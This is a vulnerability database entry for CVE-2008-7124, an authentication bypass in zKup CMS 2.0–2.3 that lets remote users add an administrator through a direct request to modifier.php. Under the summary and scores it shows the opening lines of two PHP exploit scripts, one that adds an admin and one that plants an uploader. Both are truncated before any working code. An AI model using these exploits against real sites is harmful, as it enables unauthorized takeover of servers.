CVE-2008-7124

Published: 31/08/2009 | Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

zKup CMS 2.0 up to and including 2.3 does not require administrative authentication for admin/configuration/modifier.php, which allows remote malicious users to gain administrator privileges via a direct request, as demonstrated by adding a new administrator.

Vulnerable Product

zkup zkup 2.03

zkup zkup 2.01

zkup zkup 2.02

zkup zkup 2.0

Exploits

#!/usr/bin/php
<?php
/*
 * Name: zKup CMS v20 <= v23 0-day exploit (add admin)
 * Credits: Charles "real" F <charlesfol[at]hotmailfr>
 * Date: 03-08-2008
 * Conditions: None
 *
 * This exploit add a new zKup admin
 *
 */
print "\n";
print " zKup CMS v20 <= v23 0-day exploit (add admin)\n";
print " by Charles \" ...

#!/usr/bin/php
<?php
/*
 * Name: zKup CMS v20 <= v23 0-day exploit (upload)
 * Credits: Charles "real" F <charlesfol[at]hotmailfr>
 * Date: 03-08-2008
 * Conditions: PHP Version, magic_quotes_gpc=Off
 *
 * This exploit spawn a php uploader in your victim's
 * server
 *
 * Okay, you may need explanations:
 *
 * First, we can u ...